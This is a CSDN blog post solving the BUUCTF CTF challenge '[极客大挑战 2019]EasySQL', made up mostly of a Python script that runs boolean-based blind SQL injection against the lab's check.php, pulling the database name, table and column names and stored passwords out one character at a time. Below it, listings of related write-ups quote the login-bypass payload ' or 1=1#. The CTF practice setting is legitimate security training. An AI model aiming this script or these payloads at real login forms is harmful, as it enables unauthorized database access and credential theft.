[极客大挑战 2019]EasySQL

于 2024-09-08 05:49:04 发布
阅读量139 收藏
点赞数 2
文章标签: 网络安全 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fasdaegaw/article/details/142007954
版权 
import requests
from urllib.parse import quote,unquote
import time


class SQL:
    URL='http://0b810b9d-3e3a-4655-8cb2-44efea7ab49e.node5.buuoj.cn:81/'
    '''
    for i in xxx: ??
        1.qwertyuiopasdfghjklzxcvbnm, 手动输入键盘的字符
        2.range(ord('a'),ord('z')+1)  
        3.ascii
    '''
    ascii=''
    for i in range(33,127):
        ascii+=chr(i)
    def __init__(self):
        
        self.判断当前数据库字符名称个数()
        self.当前数据库名称()
        self.表名称个数()
        self.表名()
        self.字段名个数()
        self.字段名()
        self.判断id个数()
        self.id()
        #self.username个数()
        
        self.idusernaempassword()
        
        
    def idusernaempassword(self):
        daima=''
        for ix in range(0,10000):
            for i in self.ascii:
                sql=f"1' or (select substring(group_concat(password),{ix},1)='{i}' from geekuser) #"
                sql=quote(sql)
                url=f'{self.URL}check.php?username={sql}&password=11'
                res=requests.get(url).text
                time.sleep(0.1)
                if 'flag' in res:
                    daima+=str(i)
                    print(daima)

    def username个数(self):
        for i in range(1,1000000000):
            sql=f"'1 or (select length(group_concat(username))={i} from geekuser) #"
            if self.sql注入(sql):
                print(self.sql注入(sql))

    def id(self):
        daima=''
        ascii=self.ascii
        for ix in range(8):
            for i in ascii:
                sql=f"1' or (select substring(group_concat(id),{ix},1)='{i}' from geekuser) #"
                sql=quote(sql)
                url=f'{self.URL}check.php?username={sql}&password=11'
                res=requests.get(url).text
                time.sleep(0.1)
                if 'flag' in res:
                    daima+=str(i)
                    print(daima)
    def 判断id个数(self):
     
        for i in range(1,100):
            sql=f"1' or (select length(group_concat(id))={i} from geek.geekuser) #"
            if self.sql注入(sql):
                print(self.sql注入(sql))

    def 字段名(self):
        daima=''
        for ix in range(0,21):
            for i in 'qwertyuiopasdfghjklzxcvbnm,':
                sql=f"1' or (select substring(group_concat(COLUMN_NAME),{ix},1)='{i}' from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='geekuser') #"
                sql=quote(sql)
                url=f'{self.URL}check.php?username={sql}&password=11'
                res=requests.get(url).text
                time.sleep(0.1)
                if 'flag' in res:
                    daima+=i
                    print(daima)
        else:
            print(len(daima))
        print(daima)
    
    def 字段名个数(self):
        for i in range(1,100):
            sql=f"1' or (select length(group_concat(COLUMN_NAME))={i} from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='geekuser') #"
            if self.sql注入(sql):
                print(self.sql注入(sql))

    def 表名(self):
        daima=''
        for ix in range(0,9):
            for i in 'qwertyuiopasdfghjklzxcvbnm,':
                sql=f"1' or (SELECT substring(GROUP_CONCAT(TABLE_NAME),{ix},1)='{i}' FROM information_schema.TABLES WHERE TABLE_SCHEMA=DATABASE()) #"
                sql=quote(sql)
                url=url=f'{self.URL}check.php?username={sql}&password=11'
                res=requests.get(url).text
                if 'flag' in res:
                    daima+=i
        print(daima)
    def 表名称个数(self):
        for i in range(1000):
            sql=f"1' or (SELECT LENGTH(GROUP_CONCAT(TABLE_NAME))={i} FROM information_schema.TABLES WHERE TABLE_SCHEMA=DATABASE()) #"
            print(self.sql注入(sql))
    def 当前数据库名称(self):
        for i in range(ord('a'),ord('z')+1):
            sql=f"1' or left(database(),4)='gee{chr(i)}' #"
            print(self.sql注入(sql))
    def 判断当前数据库字符名称个数(self):
        for count in range(10):
            sql=f"1' or length(database())={count} #"
            print(self.sql注入(sql))
    def sql注入(self,sql):
            sql=quote(sql)
            url=url=f'{self.URL}check.php?username={sql}&password=11'
            res=requests.get(url).text
            #time.sleep(0.1)
            if 'flag' in res:
                return unquote(sql)
                
sql=SQL()

XSJ.寒冰之雪
关注
BUUCTF Web 极客挑战 2019 EasySQL
Brilliant_orange的博客
11-22 883
(当然,我们只是猜测闭合符号是单引号,其他题目也可能是双引号)接下来,我们试试用一下万能账号或者密码两种方法(优先级:【and】>【=】>【or】,语句为真,可行,得到flag。(#后面内容注释掉了),也为真,得到flag。
[BUUCTF]极客挑战 2019EasySQL1 write up
GZWZ_的博客
03-25 3258
这道题很简单,就是想推一下万能密码,So浅写一下啦!
[极客挑战 2019]EasySQL1
m0_73759843的博客
07-06 208
一个登录框,使用万能密码:' or 1=1#
极客挑战 2019EasySQL
Lixunzhe0112的博客
01-17 415
admin ’ or 1=1 # + admin //之后又尝试了password后面也是可以进行注入的。尝试用admin+admin进行登陆给出:NO,Wrong username password!然后尝试在uasername后进行sql注入。登陆成功,并且给出了flag。
[极客挑战 2019]EasySQL解题
siu~
08-25 971
[极客挑战 2019]EasySQL解题
BUUCTF[极客挑战 2019] EasySQL 1
m0_75178803的博客
06-12 4620
因为这道题是基于sql单引号的注入,我们构造万能密码,#在sql注入中是注释符。题目来源:BUUCTF [极客挑战 2019] EasySQL 1。用or连接,因为1=1恒真,假或真=真,真或真=真,所以这个语句恒成立。输入 1' union select 1,2,3。查看报错信息发现是基于单引号的注入。由一道题简单引出万能密码的知识点。这是查询数据库可能会用到的句型。只有当输入1’时,页面报错。直接在用户名或者密码区输入。只有当列名字段数为3时,
BUUCTF:Web-[极客挑战 2019]EasySQL
wdnmddbl的博客
06-08 538
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点练习sql注入,推荐使用sql-labs这个靶场,我后续也会更新从开始搭建到攻略1-75关完整教程,早些关注上车哦。大概思路和涉及的知识点(这里我一律复制网上师傅总结的即可,网上的师傅们总结的很完美,我就不东施效颦)思路:文章很详细。
Buuctf-Web-[极客挑战 2019]EasySQL 1 题解及思路总结
m0_62239233的博客
09-16 9961
SQL注入。
BUUCTF题解之[极客挑战 2019]EasySQL 1
jungleirim的博客
10-17 402
SQL注入是一种针对Web应用程序的攻击技术,通过在应用程序的用户输入参数中嵌入SQL代码,进而攻击应用程序的数据库。攻击者可以通过SQL注入来获取敏感信息、执行无权执行的操作、甚至完全控制数据库服务器。SQL注入通常发生在Web应用程序中,因为Web应用程序使用输入参数来构建SQL语句,而这些输入参数往往不能被完全信任。攻击者可以利用这些输入参数来注入恶意代码,进而执行攻击。
BUUCTF在线测评之[极客挑战 2019]EasySQL 1
weixin_49182737的博客
03-03 5464
启动靶机 只给了一个地址,点击进去即是靶机 可以看到这是一个登录页面 虽然靶机信息那已经提示我们这是一个EasySql,结合靶机页面是登录页面,把八九不离十的可以确定这一题是考察SQL注入的,并且Easy提示我们,是简单的sql注入。 BUT出于一个网安爱好者的心态,我们还是要简单看一下这个页面的信息,说不定出题者挖坑呢 。。。 虽然结果是然并卵 所以还是老老实实听提示试sql注入吧 这里安利一下firefox,这浏览器可以在拓展里装Hackbar,一款房间寻找web安全bug的插件 一个不太好的信息时
【WEB】[极客挑战2019]EasySQL WP
Miscedence__的博客
04-15 363
0X0000000000000001 审题 其实由题目可以知道这是道SQL注入,然后看到登录,首先尝试万能密码: admin’ or ‘1’='1 如名字所说,这是一道很ez的SQL注入 通过这道题,我们来延伸一下其他东西 0X0000000000000002 关于万能密码 为什么在注入的时候输入万能密码就可以进入呢,对于所有万能密码,都是”万能“的吗? 那么首先,让我们清楚 SQL注入-万能密码的注入原理 0_用户进行用户名和密码验证时,网站需要查询数据库,查询数据库就是执行SQL语句 //
01 [极客挑战 2019]EasySQL
weixin_60937978的博客
04-23 2574
万能密码 1.解释 密码前要有单引号,来闭合SQL语句中的单引号,然后构造一个or,即或者 1=1,来构造出新的密码,即:'or'1'='1 密码最后为什么没有单引号:为了使SQL 语句不出错,用来闭合程序SQL语句后面的单引号,再加一个,会出错。 万能密码合集 asp aspx万能密码 1:”or “a”=”a 2: ‘)or(‘a’=’a 3:or 1=1– 4:’or 1=1– 5:a’or’ 1=1– 6:”or 1=1– 7:’or’a’=’a 8:...
[极客挑战 2019] EasySQL1
m0_63150097的博客
03-07 110
进入靶场: http://bf595771-c293-46f1-a5ca-3471fa3827f5.node4.buuoj.cn:81 看一下源码,找到注入点。 然后尝试万能密码,给username和password传参。 check.php?username=1'or 1=1%23&password=1 成功得到flag ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8458
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于微信小程序的新生报到系统设计与实现.docx
09-13
基于微信小程序的新生报到系统设计与实现.docx
基于java的电商平台的设计与实现.docx
最新发布
09-13
基于java的电商平台的设计与实现.docx
基于java的大学生智能消费记账系统的设计与实现.docx
09-13
基于java的大学生智能消费记账系统的设计与实现.docx
极客挑战 2019]EasySQL
09-03
EasySQL极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值